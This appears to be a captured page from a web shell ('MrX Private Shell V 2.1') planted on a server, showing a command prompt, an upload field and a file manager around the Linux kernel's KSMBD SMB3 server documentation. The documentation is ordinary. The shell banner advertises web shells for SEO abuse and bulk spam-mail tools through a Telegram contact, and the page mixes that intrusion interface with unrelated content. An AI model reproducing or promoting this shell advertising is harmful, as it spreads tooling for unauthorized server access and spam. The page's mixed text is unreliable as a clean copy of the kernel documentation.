__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.217.10: ~ $
<!DOCTYPE html>

<html lang="en" data-content_root="../../">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />

    <title>KSMBD - SMB3 Kernel Server &#8212; The Linux Kernel  documentation</title>
    <link rel="stylesheet" type="text/css" href="../../_static/pygments.css?v=fa44fd50" />
    <link rel="stylesheet" type="text/css" href="../../_static/alabaster.css?v=3918102e" />
    <script src="../../_static/documentation_options.js?v=5929fcd5"></script>
    <script src="../../_static/doctools.js?v=9bcbadda"></script>
    <script src="../../_static/sphinx_highlight.js?v=dc90522c"></script>
    <link rel="index" title="Index" href="../../genindex.html" />
    <link rel="search" title="Search" href="../../search.html" />
    <link rel="next" title="Mounting root file system via SMB (cifs.ko)" href="cifsroot.html" />
    <link rel="prev" title="CIFS" href="index.html" />
   
  <link rel="stylesheet" href="../../_static/custom.css" type="text/css" />
  

  
  

  </head><body>
  <div class="document">
    
      <div class="sphinxsidebar" role="navigation" aria-label="Main">
        <div class="sphinxsidebarwrapper">
            <p class="logo"><a href="../../index.html">
              <img class="logo" src="../../_static/logo.svg" alt="Logo of The Linux Kernel"/>
            </a></p>
<h1 class="logo"><a href="../../index.html">The Linux Kernel</a></h1>



<p class="blurb">6.18.50</p>







<search id="searchbox" style="display: none" role="search">
  <h3 id="searchlabel">Quick search</h3>
    <div class="searchformwrapper">
    <form class="search" action="../../search.html" method="get">
      <input type="text" name="q" aria-labelledby="searchlabel" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/>
      <input type="submit" value="Go" />
    </form>
    </div>
</search>
<script>document.getElementById('searchbox').style.display = "block"</script>


<p>
<h3 class="kernel-toc-contents">Contents</h3>
<input type="checkbox" class="kernel-toc-toggle" id = "kernel-toc-toggle" checked>
<label class="kernel-toc-title" for="kernel-toc-toggle"></label>

<div class="kerneltoc" id="kerneltoc">
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../process/development-process.html">Development process</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../process/submitting-patches.html">Submitting patches</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../process/code-of-conduct.html">Code of conduct</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../maintainer/index.html">Maintainer handbook</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../process/index.html">All development-process docs</a></li>
</ul>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="../../core-api/index.html">Core API</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../driver-api/index.html">Driver APIs</a></li>
<li class="toctree-l1 current"><a class="reference internal" href="../../subsystem-apis.html">Subsystems</a><ul class="current">
<li class="toctree-l2"><a class="reference internal" href="../../subsystem-apis.html#core-subsystems">Core subsystems</a></li>
<li class="toctree-l2"><a class="reference internal" href="../../subsystem-apis.html#human-interfaces">Human interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../../subsystem-apis.html#networking-interfaces">Networking interfaces</a></li>
<li class="toctree-l2 current"><a class="reference internal" href="../../subsystem-apis.html#storage-interfaces">Storage interfaces</a><ul class="current">
<li class="toctree-l3 current"><a class="reference internal" href="../index.html">Filesystems in the Linux kernel</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../block/index.html">Block</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../cdrom/index.html">CD-ROM</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../scsi/index.html">SCSI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../target/index.html">TCM Virtual Device</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../nvme/index.html">NVMe Subsystem</a></li>
</ul>
</li>
<li class="toctree-l2"><a class="reference internal" href="../../subsystem-apis.html#other-subsystems">Other subsystems</a></li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="../../locking/index.html">Locking</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../process/license-rules.html">Licensing rules</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../doc-guide/index.html">Writing documentation</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../dev-tools/index.html">Development tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../dev-tools/testing-overview.html">Testing guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../kernel-hacking/index.html">Hacking guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../trace/index.html">Tracing</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../fault-injection/index.html">Fault injection</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../livepatch/index.html">Livepatching</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../rust/index.html">Rust</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../admin-guide/index.html">Administration</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../kbuild/index.html">Build system</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../admin-guide/reporting-issues.html">Reporting issues</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../tools/index.html">Userspace tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../userspace-api/index.html">Userspace API</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../firmware-guide/index.html">Firmware</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../devicetree/index.html">Firmware and Devicetree</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../arch/index.html">CPU architectures</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../staging/index.html">Unsorted documentation</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../translations/index.html">Translations</a></li>
</ul>

</div>

<script type="text/javascript"> <!--
  var sbar = document.getElementsByClassName("sphinxsidebar")[0];
  let currents = document.getElementsByClassName("current")
  if (currents.length) {
    sbar.scrollTop = currents[currents.length - 1].offsetTop;
  }
  --> </script>
  <div role="note" aria-label="source link">
    <h3>This Page</h3>
    <ul class="this-page-menu">
      <li><a href="../../_sources/filesystems/smb/ksmbd.rst.txt"
            rel="nofollow">Show Source</a></li>
    </ul>
   </div>
        </div>
      </div>
      <div class="documentwrapper">
        <div class="bodywrapper">
          

          <div class="body" role="main">
            
  



<section id="ksmbd-smb3-kernel-server">
<h1>KSMBD - SMB3 Kernel Server<a class="headerlink" href="#ksmbd-smb3-kernel-server" title="Link to this heading">¶</a></h1>
<p>KSMBD is a linux kernel server which implements SMB3 protocol in kernel space
for sharing files over network.</p>
<section id="ksmbd-architecture">
<h2>KSMBD architecture<a class="headerlink" href="#ksmbd-architecture" title="Link to this heading">¶</a></h2>
<p>The subset of performance related operations belong in kernelspace and
the other subset which belong to operations which are not really related with
performance in userspace. So, DCE/RPC management that has historically resulted
into a number of buffer overflow issues and dangerous security bugs and user
account management are implemented in user space as ksmbd.mountd.
File operations that are related with performance (open/read/write/close etc.)
in kernel space (ksmbd). This also allows for easier integration with VFS
interface for all file operations.</p>
<section id="ksmbd-kernel-daemon">
<h3>ksmbd (kernel daemon)<a class="headerlink" href="#ksmbd-kernel-daemon" title="Link to this heading">¶</a></h3>
<p>When the server daemon is started, It starts up a forker thread
(ksmbd/interface name) at initialization time and open a dedicated port 445
for listening to SMB requests. Whenever new clients make a request, the Forker
thread will accept the client connection and fork a new thread for a dedicated
communication channel between the client and the server. It allows for parallel
processing of SMB requests(commands) from clients as well as allowing for new
clients to make new connections. Each instance is named ksmbd/1~n(port number)
to indicate connected clients. Depending on the SMB request types, each new
thread can decide to pass through the commands to the user space (ksmbd.mountd),
currently DCE/RPC commands are identified to be handled through the user space.
To further utilize the linux kernel, it has been chosen to process the commands
as workitems and to be executed in the handlers of the ksmbd-io kworker threads.
It allows for multiplexing of the handlers as the kernel takes care of initiating
extra worker threads if the load is increased and vice versa, if the load is
decreased it destroys the extra worker threads. So, after the connection is
established with the client. Dedicated ksmbd/1..n(port number) takes complete
ownership of receiving/parsing of SMB commands. Each received command is worked
in parallel i.e., there can be multiple client commands which are worked in
parallel. After receiving each command a separated kernel workitem is prepared
for each command which is further queued to be handled by ksmbd-io kworkers.
So, each SMB workitem is queued to the kworkers. This allows the benefit of load
sharing to be managed optimally by the default kernel and optimizing client
performance by handling client commands in parallel.</p>
</section>
<section id="ksmbd-mountd-user-space-daemon">
<h3>ksmbd.mountd (user space daemon)<a class="headerlink" href="#ksmbd-mountd-user-space-daemon" title="Link to this heading">¶</a></h3>
<p>ksmbd.mountd is a userspace process to, transfer the user account and password that
are registered using ksmbd.adduser (part of utils for user space). Further it
allows sharing information parameters that are parsed from smb.conf to ksmbd in
kernel. For the execution part it has a daemon which is continuously running
and connected to the kernel interface using netlink socket, it waits for the
requests (dcerpc and share/user info). It handles RPC calls (at a minimum few
dozen) that are most important for file server from NetShareEnum and
NetServerGetInfo. Complete DCE/RPC response is prepared from the user space
and passed over to the associated kernel thread for the client.</p>
</section>
</section>
<section id="ksmbd-feature-status">
<h2>KSMBD Feature Status<a class="headerlink" href="#ksmbd-feature-status" title="Link to this heading">¶</a></h2>
<table class="docutils align-default">
<thead>
<tr class="row-odd"><th class="head"><p>Feature name</p></th>
<th class="head"><p>Status</p></th>
</tr>
</thead>
<tbody>
<tr class="row-even"><td><p>Dialects</p></td>
<td><p>Supported. SMB2.1 SMB3.0, SMB3.1.1 dialects
(intentionally excludes security vulnerable SMB1
dialect).</p></td>
</tr>
<tr class="row-odd"><td><p>Auto Negotiation</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-even"><td><p>Compound Request</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-odd"><td><p>Oplock Cache Mechanism</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-even"><td><p>SMB2 leases(v1 lease)</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-odd"><td><p>Directory leases(v2 lease)</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-even"><td><p>Multi-credits</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-odd"><td><p>NTLM/NTLMv2</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-even"><td><p>HMAC-SHA256 Signing</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-odd"><td><p>Secure negotiate</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-even"><td><p>Signing Update</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-odd"><td><p>Pre-authentication integrity</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-even"><td><p>SMB3 encryption(CCM, GCM)</p></td>
<td><p>Supported. (CCM/GCM128 and CCM/GCM256 supported)</p></td>
</tr>
<tr class="row-odd"><td><p>SMB direct(RDMA)</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-even"><td><p>SMB3 Multi-channel</p></td>
<td><p>Partially Supported. Planned to implement
replay/retry mechanisms for future.</p></td>
</tr>
<tr class="row-odd"><td><p>Receive Side Scaling mode</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-even"><td><p>SMB3.1.1 POSIX extension</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-odd"><td><p>ACLs</p></td>
<td><p>Partially Supported. only DACLs available, SACLs
(auditing) is planned for the future. For
ownership (SIDs) ksmbd generates random subauth
values(then store it to disk) and use uid/gid
get from inode as RID for local domain SID.
The current acl implementation is limited to
standalone server, not a domain member.
Integration with Samba tools is being worked on
to allow future support for running as a domain
member.</p></td>
</tr>
<tr class="row-even"><td><p>Kerberos</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-odd"><td><p>Durable handle v1,v2</p></td>
<td><p>Planned for future.</p></td>
</tr>
<tr class="row-even"><td><p>Persistent handle</p></td>
<td><p>Planned for future.</p></td>
</tr>
<tr class="row-odd"><td><p>SMB2 notify</p></td>
<td><p>Planned for future.</p></td>
</tr>
<tr class="row-even"><td><p>Sparse file support</p></td>
<td><p>Supported.</p></td>
</tr>
<tr class="row-odd"><td><p>DCE/RPC support</p></td>
<td><p>Partially Supported. a few calls(NetShareEnumAll,
NetServerGetInfo, SAMR, LSARPC) that are needed
for file server handled via netlink interface
from ksmbd.mountd. Additional integration with
Samba tools and libraries via upcall is being
investigated to allow support for additional
DCE/RPC management calls (and future support
for Witness protocol e.g.)</p></td>
</tr>
<tr class="row-even"><td><p>ksmbd/nfsd interoperability</p></td>
<td><p>Planned for future. The features that ksmbd
support are Leases, Notify, ACLs and Share modes.</p></td>
</tr>
<tr class="row-odd"><td><p>SMB3.1.1 Compression</p></td>
<td><p>Planned for future.</p></td>
</tr>
<tr class="row-even"><td><p>SMB3.1.1 over QUIC</p></td>
<td><p>Planned for future.</p></td>
</tr>
<tr class="row-odd"><td><p>Signing/Encryption over RDMA</p></td>
<td><p>Planned for future.</p></td>
</tr>
<tr class="row-even"><td><p>SMB3.1.1 GMAC signing support</p></td>
<td><p>Planned for future.</p></td>
</tr>
</tbody>
</table>
</section>
<section id="how-to-run">
<h2>How to run<a class="headerlink" href="#how-to-run" title="Link to this heading">¶</a></h2>
<ol class="arabic">
<li><p>Download ksmbd-tools(<a class="reference external" href="https://github.com/cifsd-team/ksmbd-tools/releases">https://github.com/cifsd-team/ksmbd-tools/releases</a>) and
compile them.</p>
<ul>
<li><p>Refer to README(<a class="reference external" href="https://github.com/cifsd-team/ksmbd-tools/blob/master/README.md">https://github.com/cifsd-team/ksmbd-tools/blob/master/README.md</a>)
to know how to use ksmbd.mountd/adduser/addshare/control utils</p>
<p>$ ./autogen.sh
$ ./configure --with-rundir=/run
$ make &amp;&amp; sudo make install</p>
</li>
</ul>
</li>
<li><p>Create /usr/local/etc/ksmbd/ksmbd.conf file, add SMB share in ksmbd.conf file.</p>
<ul>
<li><p>Refer to ksmbd.conf.example in ksmbd-utils, See ksmbd.conf manpage
for details to configure shares.</p>
<blockquote>
<div><p>$ man ksmbd.conf</p>
</div></blockquote>
</li>
</ul>
</li>
<li><p>Create user/password for SMB share.</p>
<ul>
<li><p>See ksmbd.adduser manpage.</p>
<p>$ man ksmbd.adduser
$ sudo ksmbd.adduser -a &lt;Enter USERNAME for SMB share access&gt;</p>
</li>
</ul>
</li>
<li><p>Insert the ksmbd.ko module after you build your kernel. No need to load the module
if ksmbd is built into the kernel.</p>
<ul>
<li><dl>
<dt>Set ksmbd in menuconfig(e.g. $ make menuconfig)</dt><dd><dl>
<dt>[*] Network File Systems  ---&gt;</dt><dd><blockquote>
<div><p>&lt;M&gt; SMB3 server support (EXPERIMENTAL)</p>
</div></blockquote>
<p>$ sudo modprobe ksmbd.ko</p>
</dd>
</dl>
</dd>
</dl>
</li>
</ul>
</li>
<li><p>Start ksmbd user space daemon</p>
<blockquote>
<div><p>$ sudo ksmbd.mountd</p>
</div></blockquote>
</li>
<li><p>Access share from Windows or Linux using SMB3 client (cifs.ko or smbclient of samba)</p></li>
</ol>
</section>
<section id="shutdown-ksmbd">
<h2>Shutdown KSMBD<a class="headerlink" href="#shutdown-ksmbd" title="Link to this heading">¶</a></h2>
<ol class="arabic simple">
<li><dl class="simple">
<dt>kill user and kernel space daemon</dt><dd><p># sudo ksmbd.control -s</p>
</dd>
</dl>
</li>
</ol>
</section>
<section id="how-to-turn-debug-print-on">
<h2>How to turn debug print on<a class="headerlink" href="#how-to-turn-debug-print-on" title="Link to this heading">¶</a></h2>
<p>Each layer
/sys/class/ksmbd-control/debug</p>
<ol class="arabic simple">
<li><dl class="simple">
<dt>Enable all component prints</dt><dd><p># sudo ksmbd.control -d “all”</p>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>Enable one of the components (smb, auth, vfs, oplock, ipc, conn, rdma)</dt><dd><p># sudo ksmbd.control -d “smb”</p>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>Show what prints are enabled.</dt><dd><dl class="simple">
<dt># cat /sys/class/ksmbd-control/debug</dt><dd><p>[smb] auth vfs oplock ipc conn [rdma]</p>
</dd>
</dl>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>Disable prints:</dt><dd><p>If you try the selected component once more, It is disabled without brackets.</p>
</dd>
</dl>
</li>
</ol>
</section>
</section>


          </div>
          
        </div>
      </div>
    <div class="clearer"></div>
  </div>
    <div class="footer">
      &#169;The kernel development community.
      
      |
      Powered by <a href="https://www.sphinx-doc.org/">Sphinx 8.1.3</a>
      &amp; <a href="https://alabaster.readthedocs.io">Alabaster 0.7.16</a>
      
      |
      <a href="../../_sources/filesystems/smb/ksmbd.rst.txt"
          rel="nofollow">Page source</a>
    </div>

    

    
  </body>
</html>

Filemanager

Name Type Size Permission Actions
cifsroot.html File 12.48 KB 0644
index.html File 8.41 KB 0644
ksmbd.html File 18.59 KB 0644
smbdirect.html File 12.83 KB 0644
Filemanager